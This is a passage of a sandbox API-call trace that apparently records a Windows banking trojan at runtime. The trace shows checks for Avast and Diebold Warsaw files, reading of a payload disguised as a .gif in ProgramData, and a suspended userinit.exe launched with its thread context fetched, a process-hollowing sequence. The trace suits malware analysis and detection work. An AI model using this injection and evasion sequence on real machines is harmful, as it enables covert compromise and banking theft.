[29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0188.551] ResumeThread (hThread=0x138) returned 0x1
[0188.551] VirtualFree (lpAddress=0x1c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0188.552] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0188.552] GlobalUnlock (hMem=0x189000c) returned 0
[0188.552] GlobalHandle (pMem=0x1fd0f0) returned 0x1890004
[0188.552] GlobalUnlock (hMem=0x1890004) returned 0
[0188.558] Sleep (dwMilliseconds=0xe74e)
[0199.798] VirtualFree (lpAddress=0x1cf0000, dwSize=0x4000, dwFreeType=0x4000) returned 1
[0199.798] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0199.799] FindFirstFileA (in: lpFileName="C:\\Program Files\\AVAST Software\\Avast\\aswRunDll.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0199.799] FindFirstFileA (in: lpFileName="C:\\Program Files\\Diebold\\Warsaw\\unins000.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0199.799] FindFirstFileA (in: lpFileName="C:\\Windows\\SysWOW64\\userinit.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0199.799] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmgx.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmgx.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140
[0199.799] SetFilePointer (in: hFile=0x140, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xee1c8*=0) returned 0x0
[0199.799] SetFilePointer (in: hFile=0x140, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x0
[0199.799] SetFilePointer (in: hFile=0x140, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x5e000
[0199.799] SetFilePointer (in: hFile=0x140, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x0
[0199.801] GlobalLock (hMem=0x1890004) returned 0x1fd0f0
[0199.801] ReadFile (in: hFile=0x140, lpBuffer=0x1fd0f0, nNumberOfBytesToRead=0x5e000, lpNumberOfBytesRead=0xee1dc, lpOverlapped=0x0 | out: lpBuffer=0x1fd0f0*, lpNumberOfBytesRead=0xee1dc*=0x5e000, lpOverlapped=0x0) returned 1
[0199.806] CloseHandle (hObject=0x140) returned 1
[0199.807] GlobalLock (hMem=0x189000c) returned 0x25b100
[0199.807] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0199.807] GlobalUnlock (hMem=0x189000c) returned 0
[0199.807] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4000, uFlags=0x2) returned 0x189000c
[0199.807] GlobalLock (hMem=0x189000c) returned 0x25b100
[0199.808] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0199.808] GlobalUnlock (hMem=0x189000c) returned 0
[0199.808] GlobalReAlloc (hMem=0x189000c, dwBytes=0x6000, uFlags=0x2) returned 0x189000c
[0199.809] GlobalLock (hMem=0x189000c) returned 0x25f110
[0199.810] GlobalHandle (pMem=0x25f110) returned 0x189000c
[0199.810] GlobalUnlock (hMem=0x189000c) returned 0
[0199.810] GlobalReAlloc (hMem=0x189000c, dwBytes=0x8000, uFlags=0x2) returned 0x189000c
[0199.810] GlobalLock (hMem=0x189000c) returned 0x265120
[0199.811] GlobalHandle (pMem=0x265120) returned 0x189000c
[0199.811] GlobalUnlock (hMem=0x189000c) returned 0
[0199.811] GlobalReAlloc (hMem=0x189000c, dwBytes=0xa000, uFlags=0x2) returned 0x189000c
[0199.811] GlobalLock (hMem=0x189000c) returned 0x265120
[0199.812] GlobalHandle (pMem=0x265120) returned 0x189000c
[0199.812] GlobalUnlock (hMem=0x189000c) returned 0
[0199.812] GlobalReAlloc (hMem=0x189000c, dwBytes=0xc000, uFlags=0x2) returned 0x189000c
[0199.813] GlobalLock (hMem=0x189000c) returned 0x26f130
[0199.814] GlobalHandle (pMem=0x26f130) returned 0x189000c
[0199.814] GlobalUnlock (hMem=0x189000c) returned 0
[0199.814] GlobalReAlloc (hMem=0x189000c, dwBytes=0xe000, uFlags=0x2) returned 0x189000c
[0199.814] GlobalLock (hMem=0x189000c) returned 0x25b100
[0199.815] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0199.815] GlobalUnlock (hMem=0x189000c) returned 0
[0199.815] GlobalReAlloc (hMem=0x189000c, dwBytes=0x10000, uFlags=0x2) returned 0x189000c
[0199.815] GlobalLock (hMem=0x189000c) returned 0x25b100
[0199.816] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0199.816] GlobalUnlock (hMem=0x189000c) returned 0
[0199.816] GlobalReAlloc (hMem=0x189000c, dwBytes=0x12000, uFlags=0x2) returned 0x189000c
[0199.816] GlobalLock (hMem=0x189000c) returned 0x25b100
[0199.817] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0199.817] GlobalUnlock (hMem=0x189000c) returned 0
[0199.817] GlobalReAlloc (hMem=0x189000c, dwBytes=0x14000, uFlags=0x2) returned 0x189000c
[0199.817] GlobalLock (hMem=0x189000c) returned 0x25b100
[0199.818] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0199.818] GlobalUnlock (hMem=0x189000c) returned 0
[0199.818] GlobalReAlloc (hMem=0x189000c, dwBytes=0x16000, uFlags=0x2) returned 0x189000c
[0199.818] GlobalLock (hMem=0x189000c) returned 0x25b100
[0199.819] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0199.819] GlobalUnlock (hMem=0x189000c) returned 0
[0199.819] GlobalReAlloc (hMem=0x189000c, dwBytes=0x18000, uFlags=0x2) returned 0x189000c
[0199.819] GlobalLock (hMem=0x189000c) returned 0x25b100
[0199.820] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0199.820] GlobalUnlock (hMem=0x189000c) returned 0
[0199.820] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1a000, uFlags=0x2) returned 0x189000c
[0199.820] GlobalLock (hMem=0x189000c) returned 0x25b100
[0199.820] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0199.820] GlobalUnlock (hMem=0x189000c) returned 0
[0199.821] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1c000, uFlags=0x2) returned 0x189000c
[0199.821] GlobalLock (hMem=0x189000c) returned 0x25b100
[0199.821] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0199.821] GlobalUnlock (hMem=0x189000c) returned 0
[0199.821] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1e000, uFlags=0x2) returned 0x189000c
[0199.821] GlobalLock (hMem=0x189000c) returned 0x25b100
[0199.822] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0199.822] GlobalUnlock (hMem=0x189000c) returned 0
[0199.822] GlobalReAlloc (hMem=0x189000c, dwBytes=0x20000, uFlags=0x2) returned 0x189000c
[0199.822] GlobalLock (hMem=0x189000c) returned 0x25b100
[0199.823] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0199.823] GlobalUnlock (hMem=0x189000c) returned 0
[0199.823] GlobalReAlloc (hMem=0x189000c, dwBytes=0x22000, uFlags=0x2) returned 0x189000c
[0199.824] GlobalLock (hMem=0x189000c) returned 0x27b110
[0199.825] GlobalHandle (pMem=0x27b110) returned 0x189000c
[0199.825] GlobalUnlock (hMem=0x189000c) returned 0
[0199.825] GlobalReAlloc (hMem=0x189000c, dwBytes=0x24000, uFlags=0x2) returned 0x189000c
[0199.825] GlobalLock (hMem=0x189000c) returned 0x27b110
[0199.826] GlobalHandle (pMem=0x27b110) returned 0x189000c
[0199.826] GlobalUnlock (hMem=0x189000c) returned 0
[0199.826] GlobalReAlloc (hMem=0x189000c, dwBytes=0x26000, uFlags=0x2) returned 0x189000c
[0199.827] GlobalLock (hMem=0x189000c) returned 0x29f120
[0199.828] GlobalHandle (pMem=0x29f120) returned 0x189000c
[0199.828] GlobalUnlock (hMem=0x189000c) returned 0
[0199.828] GlobalReAlloc (hMem=0x189000c, dwBytes=0x28000, uFlags=0x2) returned 0x189000c
[0199.828] GlobalLock (hMem=0x189000c) returned 0x25b100
[0199.829] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0199.829] GlobalUnlock (hMem=0x189000c) returned 0
[0199.829] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2a000, uFlags=0x2) returned 0x189000c
[0199.829] GlobalLock (hMem=0x189000c) returned 0x25b100
[0199.830] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0199.830] GlobalUnlock (hMem=0x189000c) returned 0
[0199.830] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2c000, uFlags=0x2) returned 0x189000c
[0199.830] GlobalLock (hMem=0x189000c) returned 0x25b100
[0199.831] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0199.831] GlobalUnlock (hMem=0x189000c) returned 0
[0199.831] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2e000, uFlags=0x2) returned 0x189000c
[0199.831] GlobalLock (hMem=0x189000c) returned 0x25b100
[0199.831] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0199.831] GlobalUnlock (hMem=0x189000c) returned 0
[0199.831] GlobalReAlloc (hMem=0x189000c, dwBytes=0x30000, uFlags=0x2) returned 0x189000c
[0199.831] GlobalLock (hMem=0x189000c) returned 0x25b100
[0199.832] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0199.832] GlobalUnlock (hMem=0x189000c) returned 0
[0199.832] GlobalReAlloc (hMem=0x189000c, dwBytes=0x32000, uFlags=0x2) returned 0x189000c
[0199.832] GlobalLock (hMem=0x189000c) returned 0x25b100
[0199.833] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0199.833] GlobalUnlock (hMem=0x189000c) returned 0
[0199.833] GlobalReAlloc (hMem=0x189000c, dwBytes=0x34000, uFlags=0x2) returned 0x189000c
[0199.833] GlobalLock (hMem=0x189000c) returned 0x25b100
[0199.834] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0199.834] GlobalUnlock (hMem=0x189000c) returned 0
[0199.834] GlobalReAlloc (hMem=0x189000c, dwBytes=0x36000, uFlags=0x2) returned 0x189000c
[0199.834] GlobalLock (hMem=0x189000c) returned 0x25b100
[0199.834] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0199.834] GlobalUnlock (hMem=0x189000c) returned 0
[0199.834] GlobalReAlloc (hMem=0x189000c, dwBytes=0x38000, uFlags=0x2) returned 0x189000c
[0199.834] GlobalLock (hMem=0x189000c) returned 0x25b100
[0199.835] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0199.835] GlobalUnlock (hMem=0x189000c) returned 0
[0199.835] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3a000, uFlags=0x2) returned 0x189000c
[0199.835] GlobalLock (hMem=0x189000c) returned 0x25b100
[0199.836] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0199.836] GlobalUnlock (hMem=0x189000c) returned 0
[0199.836] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3c000, uFlags=0x2) returned 0x189000c
[0199.836] GlobalLock (hMem=0x189000c) returned 0x25b100
[0199.836] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0199.836] GlobalUnlock (hMem=0x189000c) returned 0
[0199.836] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3e000, uFlags=0x2) returned 0x189000c
[0199.837] GlobalLock (hMem=0x189000c) returned 0x25b100
[0199.837] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0199.837] GlobalUnlock (hMem=0x189000c) returned 0
[0199.837] GlobalReAlloc (hMem=0x189000c, dwBytes=0x40000, uFlags=0x2) returned 0x189000c
[0199.837] GlobalLock (hMem=0x189000c) returned 0x25b100
[0199.838] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0199.838] GlobalUnlock (hMem=0x189000c) returned 0
[0199.838] GlobalReAlloc (hMem=0x189000c, dwBytes=0x42000, uFlags=0x2) returned 0x189000c
[0199.838] GlobalLock (hMem=0x189000c) returned 0x25b100
[0199.839] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0199.839] GlobalUnlock (hMem=0x189000c) returned 0
[0199.839] GlobalReAlloc (hMem=0x189000c, dwBytes=0x44000, uFlags=0x2) returned 0x189000c
[0199.839] GlobalLock (hMem=0x189000c) returned 0x25b100
[0199.839] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0199.839] GlobalUnlock (hMem=0x189000c) returned 0
[0199.839] GlobalReAlloc (hMem=0x189000c, dwBytes=0x46000, uFlags=0x2) returned 0x189000c
[0199.839] GlobalLock (hMem=0x189000c) returned 0x25b100
[0199.840] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0199.840] GlobalUnlock (hMem=0x189000c) returned 0
[0199.840] GlobalReAlloc (hMem=0x189000c, dwBytes=0x48000, uFlags=0x2) returned 0x189000c
[0199.840] GlobalLock (hMem=0x189000c) returned 0x25b100
[0199.841] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0199.841] GlobalUnlock (hMem=0x189000c) returned 0
[0199.841] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4a000, uFlags=0x2) returned 0x189000c
[0199.841] GlobalLock (hMem=0x189000c) returned 0x25b100
[0199.842] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0199.842] GlobalUnlock (hMem=0x189000c) returned 0
[0199.842] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4c000, uFlags=0x2) returned 0x189000c
[0199.842] GlobalLock (hMem=0x189000c) returned 0x25b100
[0199.843] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0199.843] GlobalUnlock (hMem=0x189000c) returned 0
[0199.843] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4e000, uFlags=0x2) returned 0x189000c
[0199.843] GlobalLock (hMem=0x189000c) returned 0x25b100
[0199.843] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0199.843] GlobalUnlock (hMem=0x189000c) returned 0
[0199.843] GlobalReAlloc (hMem=0x189000c, dwBytes=0x50000, uFlags=0x2) returned 0x189000c
[0199.843] GlobalLock (hMem=0x189000c) returned 0x25b100
[0199.844] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0199.844] GlobalUnlock (hMem=0x189000c) returned 0
[0199.844] GlobalReAlloc (hMem=0x189000c, dwBytes=0x52000, uFlags=0x2) returned 0x189000c
[0199.844] GlobalLock (hMem=0x189000c) returned 0x25b100
[0199.892] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0199.892] GlobalUnlock (hMem=0x189000c) returned 0
[0199.892] GlobalReAlloc (hMem=0x189000c, dwBytes=0x54000, uFlags=0x2) returned 0x189000c
[0199.892] GlobalLock (hMem=0x189000c) returned 0x25b100
[0199.893] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0199.893] GlobalUnlock (hMem=0x189000c) returned 0
[0199.893] GlobalReAlloc (hMem=0x189000c, dwBytes=0x56000, uFlags=0x2) returned 0x189000c
[0199.893] GlobalLock (hMem=0x189000c) returned 0x25b100
[0199.894] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0199.894] GlobalUnlock (hMem=0x189000c) returned 0
[0199.894] GlobalReAlloc (hMem=0x189000c, dwBytes=0x58000, uFlags=0x2) returned 0x189000c
[0199.894] GlobalLock (hMem=0x189000c) returned 0x25b100
[0199.895] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0199.895] GlobalUnlock (hMem=0x189000c) returned 0
[0199.895] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5a000, uFlags=0x2) returned 0x189000c
[0199.895] GlobalLock (hMem=0x189000c) returned 0x25b100
[0199.896] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0199.896] GlobalUnlock (hMem=0x189000c) returned 0
[0199.896] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5c000, uFlags=0x2) returned 0x189000c
[0199.896] GlobalLock (hMem=0x189000c) returned 0x25b100
[0199.897] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0199.897] GlobalUnlock (hMem=0x189000c) returned 0
[0199.897] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5e000, uFlags=0x2) returned 0x189000c
[0199.897] GlobalLock (hMem=0x189000c) returned 0x25b100
[0199.898] CreateProcessA (in: lpApplicationName="C:\\Windows\\System32\\userinit.exe", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1b0c20*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1b0c10 | out: lpCommandLine="", lpProcessInformation=0x1b0c10*(hProcess=0x13c, hThread=0x140, dwProcessId=0x980, dwThreadId=0x8d8)) returned 1
[0199.900] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x1000, flProtect=0x4) returned 0x1c0000
[0199.900] GetThreadContext (in: hThread=0x140, lpContext=0x1c0000 | out: lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdf000, Edx=0x0, Ecx=0x0, Eax=0x802be9, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x10fcd0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, 